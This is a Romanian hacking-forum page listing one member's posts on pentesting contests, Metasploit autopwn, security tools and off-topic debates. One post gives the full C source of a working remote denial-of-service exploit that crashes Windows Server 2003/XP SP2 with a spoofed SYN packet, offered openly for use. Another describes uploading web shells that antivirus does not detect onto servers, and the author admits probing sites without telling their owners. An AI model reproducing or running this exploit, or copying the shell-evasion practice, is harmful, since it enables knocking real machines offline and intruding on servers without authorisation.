Jump to content

escalation666

Active Members
  • Posts

    567
  • Joined

  • Last visited

  • Days Won

    3

Everything posted by escalation666

  1. Clar ca ar fi ilegala activitatea asta, dar dat fiind faptul ca se vor trimite email-uri administratorilor, in cazul in care se ajunge la tribunal se pot intruni conditiile pentru o eliberare pe cautiune sau pentru reducerea pedepsei Acuma...ar putea fi un serviciu GRATUIT de care ar beneficia incapabilii de administratori si webmasteri care probabil iau bani buni pentru ca site-urile lor sa aiba vulnerabilitati. In general politica mea e sa nu-i anunt pe admini de vulnerabilitatile gasite, sa nu le fac deface, sa nu le aduc prejudicii lor sau clientilor lor si chestii de astea...ma multumesc cu experienta si lucrurile noi pe care am avut ocazia sa le invat. Si asta pentru pentru ca fac ceva gratuit....in timpul meu liber...si nu as vrea sa inlesnesc probabil un buhai de administrator ascensiunea lui in ierarhie sau o marire de salariu (s-ar putea lauda cu descoperirile mele si cu faptul ca a securizat si chestii de genul). Bineinteles ca exista cazuri particulare in care afinitatile mele pentru site-ul in cauza ma fac sa anunt pe cineva de vulnerabilitati.... Si acuma revenind la subiect, ati putea face un anunt mare si lat pe prima pagina cum ca faceti pentesting gratuit sub forma unui challange....sau sa faceti publicitate astfel incat propietarii de site-uri sa vina ei la voi si nu invers. Asta ca sa fiti in legalitate. Treaba asta e foarte complica dpv juridic...chiar si pentesterii acreditati...cu certificate si tot tacamul pot avea probleme legale...e o linie foarte subtire intre legal si ilegal.
  2. Cred ca folosirea unui fel de template pentru intocmirea raportului mi s-ar parea o idee buna, in stilul in care pentesterii profesionisti il realizeaza. Si aici ma refer la un raport destul de profesionist, pentru ca pana la urma va fi dat celor care administreza site-ul in cauza. Ar putea contine: felul in care s-a desfasurat testarea securitatii, vulnerabilitati descoperite, metode de rezolvare/prevenire a problemelor, chestii de genul acesta... Sper ca nu ma indepartez de la ideea de baza prea mult
  3. pt comozii care folosesc windowze le recomand cygwin
  4. Imi place ideea, numai ca fiind vorba despre un site numai mi se pare cam limitata...eu propun sa se generalizeze la nivel de domeniu si subdomenii. Astfel va fi o arie de activitate ca sa spun asa, mai larga si probabil se poate evita ca ids-urile sa o ia razna...sau polemici gen: eu am fost primul blah blah...de asemenea fiind ca tot am pomenit de ids, propun sa se interzica folosirea scannerelor( cu toate ca nu prea ai cum sa verifici daca au fost folosite sau nu).
  5. Mi se pare o idee buna, mai buna decat cea despre concursul cu fotografii. Doar ca in loc de concurs, mi-ar place ideea de freestyle project, ceva in genul: unul vine cu o idee, sau mai multi vin cu o idee, se creeaza o lista cu posibile proiecte, iar urmatorul pas e ca cineva sa-si aleaga un proiect, chestie asemanatoare cu ce fac astia de pe sourceforge sau freshmeat.
  6. gresit. cripteaza fisiere pussy d'oh
  7. Rezultatele se salveaza in postgres...ca doar nu degeaba folosesti baza de date...daca te uiti prin scripturi pe acolo ai sa vezi exact cum se numeste...cu sessions -l vezi cate sesiuni active ai...si cu sessions -i intereactionezi cu ele....nu prea ai ce salva Apropo de automatizarea asta....eu am incercat acu cateva luni in urma...si fara nici un rezultat valabil....exista cineva care o avut rezultate? Asa...si ca o ultima completare de ex daca pui sa exploateze portul 80....nu ar fi stealth deloc, pentru ca ar incerca toate exploiturile pe care le are pentru portul 80, deci daca target-ul meu ruleaza un Apache, degeaba autopwn-ul va incerca exploituri de IIS de exemplu. Oricum is putin dezamagit de ultima versiune de framework pentru ca e putin buggy...
  8. wellcome here moubik
  9. Gata mah terminati cu aiureala....viata unui om e prea complexa si implica mult prea multe variabile ca cineva sau o ceva sa iti spuna cand vei muri.
  10. geniu neinteles
  11. si mie mi s-a intamplat de multe ori sa nu uploadeze shellul din cauza antivirusului , in special pe serverele windows....in asemenea cazuri folosesc alt shell pe care nu-l detecteaza...
  12. heh...e putin cam veche aceasta noutate....dar imi aminteste de vremurile in care terorizam lumea din retea cu acest tip de atac.....cine e interesat are mai jos codul sursa #include <stdio.h> #include <ctype.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <sysexits.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> /* Windows Server 2003 and XP SP2 remote DoS exploit Tested under OpenBSD 3.6 at WinXP SP 2 Vuln by Dejan Levaja <dejan_@_levaja.com> (c)oded by __blf 2005 RusH Security Team , [url]http://rst.void.ru[/url] Gr33tz: zZz, Phoenix, MishaSt, Inck-vizitor Fuck lamerz: Saint_I, nmalykh, Mr. Clumsy All rights reserved. */ //checksum function by r0ach u_short checksum (u_short *addr, int len) { u_short *w = addr; int i = len; int sum = 0; u_short answer; while (i > 0) { sum += *w++; i-=2; } if (i == 1) sum += *(u_char *)w; sum = (sum >> 16) + (sum & 0xffff); sum = sum + (sum >> 16); return (~sum); } int main(int argc, char ** argv) { struct in_addr src, dst; struct sockaddr_in sin; struct _pseudoheader { struct in_addr source_addr; struct in_addr destination_addr; u_char zero; u_char protocol; u_short length; } pseudoheader; struct ip * iph; struct tcphdr * tcph; int mysock; u_char * packet; u_char * pseudopacket; int on = 1; if( argc != 3) { fprintf(stderr, "r57windos.c by __blf\n"); fprintf(stderr, "RusH Security Team\n"); fprintf(stderr, "Usage: %s <dest ip> <dest port>\n", argv[0]); return EX_USAGE; } if ((packet = (char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr))) == NULL) { perror("malloc()\n"); return EX_OSERR; } inet_aton(argv[1], &src); inet_aton(argv[1], &dst); iph = (struct ip *) packet; iph->ip_v = IPVERSION; iph->ip_hl = 5; iph->ip_tos = 0; iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr)); iph->ip_off = htons(IP_DF); iph->ip_ttl = 255; iph->ip_p = IPPROTO_TCP; iph->ip_sum = 0; iph->ip_src = src; iph->ip_dst = dst; tcph = (struct tcphdr *)(packet +sizeof(struct ip)); tcph->th_sport = htons(atoi(argv[2])); tcph->th_dport = htons(atoi(argv[2])); tcph->th_seq = ntohl(rand()); tcph->th_ack = rand(); tcph->th_off = 5; tcph->th_flags = TH_SYN; // setting up TCP SYN flag here tcph->th_win = htons(512); tcph->th_sum = 0; tcph->th_urp = 0; pseudoheader.source_addr = src; pseudoheader.destination_addr = dst; pseudoheader.zero = 0; pseudoheader.protocol = IPPROTO_TCP; pseudoheader.length = htons(sizeof(struct tcphdr)); if((pseudopacket = (char *)malloc(sizeof(pseudoheader)+sizeof(struct tcphdr))) == NULL) { perror("malloc()\n"); return EX_OSERR; } memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader)); memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr)); tcph->th_sum = checksum((u_short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr)); mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW); if(!mysock) { perror("socket!\n"); return EX_OSERR; } if(setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) { perror("setsockopt"); shutdown(mysock, 2); return EX_OSERR; } sin.sin_family = PF_INET; sin.sin_addr = dst; sin.sin_port = htons(80); if(sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr), 0, (struct sockaddr *)&sin, sizeof(sin)) == -1) { perror("sendto()\n"); shutdown(mysock, 2); return EX_OSERR; } printf("Packet sent. Remote machine should be down.\n"); shutdown(mysock, 2); return EX_OK; }
  13. i will stick with nmap....are si el arp ping
  14. nu prea inteleg ce vrei sa zici.... gata...m-am prins....am dat un google rapid....chiar citisem acu ceva timp in urma o intamplare de pe acolo....cum ajunge nigerianul sa ia tzapa...il face un britanic sa-i trimita o sculptura....si un video cu sceneta dupa Monty Python's Flying Circus...
  15. Clar ca e o gluma...doar am spus ca e ceva amuzant....mi-o placut partea cu Nigeria care face o referire subtila la scammurile 419...if u know what i mean
  16. a mai fost postat de mine....credits BOGYMAN
  17. Neah...tiganii provin din nordul Indiei...si au fost adusi ca robi in tara noastra, sau mai era datina ca voievozii sa mai prinda cate o haita de tigani nomazi care trecea prin tinuturile lor si sa o inrobeasca. O minte deschisa nu ar trebui sa fie rasista sau xenofoba. Cred ca deja topicul asta incalca una din regulile forumului.... Asa...am gasit...art 10 alineatul 1 paragraful 1 Efeseni 7 cu 9 din Regulament spune clar despre discriminari.
  18. a ostrogotilor? :roll: sau invazia vasalilor cum o zis unul la istorie (cred ca vroia sa zica slavi) deci Transilvania a fost cucerita de vasali iar Jesus s-a nascut in anul 100 i.hr
  19. Ii crezi asa de inapoiati pe arabi? Sa nu uitam de cifrele arabe....in evul mediu: de al-gebr de la care provine cuvantul algebra...de medicii arabi...savantii si poetii...din cate stiu europenii au vazut prima oara praful de pusca in tinuturile cucerite de cruciati...iar exemplele pot continua. Iar in prezent sa stii ca cei din Arabia Saudita, Emiratele Arabe Unite, Kuweit, Qatar, Bahrein etc probabil au un nivel de trai mai inalt decat avem noi acuma. Fostul meu profesor de geografie spunea ca acolo ziarele nu costa nimic...se dau gratuit...deci da-ti seama...Si fiind musulmani au legi mult mai aspre decat occidentul (femeile trebuie sa poarte chestiile alea pe cap, inainte furtul se pedepsea cu taierea mainii, pedeapsa cu moartea inca nu o fost abolita, la ora 12 atunci cand muezinul, preotul lor, se roaga din minaretele acelea, trebuie sa incetezi orice activitate si sa te rogi si tu.....etc) Nu stiu legislatia din Turcia, dar stiu ca acolo conexiunea la internet este in plina dezvoltare si este la inceput de drum. Daca e sa fac o comparatie, as compara situatia lor cu cea a Romaniei de acu mai multi ani de zile, in care nu existau legi in domeniul criminalitatii informatice, iar romanasii faceau tot ce vroiau ei pe Internet fara frica. Sper ca defacerii turci sa se potoleasca dupa ce or sa scada vulnerabilitatile rfi, prin ultimele masuri de siguranta luate de team-ul php si de catre Stefan Esser.
  20. nice job ai putea insa sa-l faci cu adevarat o "distributie windows" orientata spre securitate, reducand dimensiunea windowsului (ai putea folosi windows lite sau o versiune modifcata de win 2003 server). si dotand-ul cu cateva sute de mega de toolz.
  21. interesant...este si pe linux un astfel de program numit etherape.
  22. tine aici tata o moaca pentru tel tau
  23. eu am zis NU
  24. O chestie amuzanta: http://www.flixxy.com/internet-online-data-loss.htm?a=5 In urma caderii Internetului, in Nigeria s-a inregistrat colapsul economic deoarece 94% din PNB provine din Internet. buahahahahah
×
×
  • Create New...